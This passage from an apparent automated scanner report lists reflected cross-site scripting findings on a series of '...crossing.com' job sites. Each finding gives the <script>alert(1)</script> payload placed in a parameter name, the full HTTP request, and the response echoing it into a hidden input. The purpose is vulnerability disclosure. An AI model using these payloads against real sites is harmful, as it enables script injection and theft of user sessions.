Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113405

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.logisticscrossing.com/?2c0f2"><script>alert(1)</script>581f158145d=1">
...[SNIP]...

3.84. http://www.managercrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.managercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa799"><script>alert(1)</script>4bc6ed1bde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fa799"><script>alert(1)</script>4bc6ed1bde1=1 HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=94ctq8p6ivl3v99kap75ucf440; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128649

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.managercrossing.com/?fa799"><script>alert(1)</script>4bc6ed1bde1=1">
...[SNIP]...

3.85. http://www.manufacturingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manufacturingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c71b"><script>alert(1)</script>02fbec31cd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3c71b"><script>alert(1)</script>02fbec31cd7=1 HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2vlv8pl6j195dlj5ftspu2fa42; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121495

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.manufacturingcrossing.com/?3c71b"><script>alert(1)</script>02fbec31cd7=1">
...[SNIP]...

3.86. http://www.marketingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marketingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da59"><script>alert(1)</script>7f14b1855c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2da59"><script>alert(1)</script>7f14b1855c9=1 HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:45 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=3j1g01ot7jp0c1torvm4m80pj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.marketingcrossing.com/?2da59"><script>alert(1)</script>7f14b1855c9=1">
...[SNIP]...

3.87. http://www.mediajobcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediajobcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 444a4"><script>alert(1)</script>f1c71a28164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?444a4"><script>alert(1)</script>f1c71a28164=1 HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kmd4t8g4d1d4ki1cuj88l3bbe7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122756

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.mediajobcrossing.com/?444a4"><script>alert(1)</script>f1c71a28164=1">
...[SNIP]...

3.88. http://www.militarycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.militarycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0099"><script>alert(1)</script>0eefe3fc8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0099"><script>alert(1)</script>0eefe3fc8f1=1 HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=07205f964obb17b1v9f3cfauq6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.militarycrossing.com/?f0099"><script>alert(1)</script>0eefe3fc8f1=1">
...[SNIP]...

3.89. http://www.nursingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nursingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e967"><script>alert(1)</script>7f175de2ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3e967"><script>alert(1)</script>7f175de2ffb=1 HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gj77rk9bta460ddthltprn68v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104462

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.nursingcrossing.com/?3e967"><script>alert(1)</script>7f175de2ffb=1">
...[SNIP]...

3.90. http://www.occupationaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.occupationaltherapycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718c9"><script>alert(1)</script>ed54ab267f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?718c9"><script>alert(1)</script>ed54ab267f0=1 HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ntth3d6lgao3t4tjcnm0jeuoa2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106559

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.occupationaltherapycrossing.com/?718c9"><script>alert(1)</script>ed54ab267f0=1">
...[SNIP]...

3.91. http://www.operationscrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.operationscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43e7"><script>alert(1)</script>39abb463529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c43e7"><script>alert(1)</script>39abb463529=1 HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:08 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vmuk5k202atl7l2lqpceah52g3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118202

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.operationscrossing.com/?c43e7"><script>alert(1)</script>39abb463529=1">
...[SNIP]...

3.92. http://www.parttimecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parttimecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74114"><script>alert(1)</script>f6783053e84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?74114"><script>alert(1)</script>f6783053e84=1 HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:19 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=autgq8pu824jrji4an8ujk4c15; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110622

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.parttimecrossing.com/?74114"><script>alert(1)</script>f6783053e84=1">
...[SNIP]...

3.93. http://www.pharmaceuticalcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pharmaceuticalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b38"><script>alert(1)</script>ef57d7684ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?20b38"><script>alert(1)</script>ef57d7684ea=1 HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mihqustv5smd5unl99nhgf6ie2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119527

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.pharmaceuticalcrossing.com/?20b38"><script>alert(1)</script>ef57d7684ea=1">
...[SNIP]...

3.94. http://www.physicalsecuritycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physicalsecuritycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587a0"><script>alert(1)</script>15ac57f2af2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?587a0"><script>alert(1)</script>15ac57f2af2=1 HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6n27njhk9iq46bh77j2bk4h5b3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107084

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.physicalsecuritycrossing.com/?587a0"><script>alert(1)</script>15ac57f2af2=1">
...[SNIP]...

3.95. http://www.physicaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physicaltherapycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1b8"><script>alert(1)</script>a05ed2ff752 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a1b8"><script>alert(1)</script>a05ed2ff752=1 HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:24 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a8c9mu27mlnqa553k64g321h72; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116184

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.physicaltherapycrossing.com/?4a1b8"><script>alert(1)</script>a05ed2ff752=1">
...[SNIP]...

3.96. http://www.planningcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.planningcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131dd"><script>alert(1)</script>32e79ab8991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?131dd"><script>alert(1)</script>32e79ab8991=1 HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j7ia85hmb3rcq7tsq3p6afa6j6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT
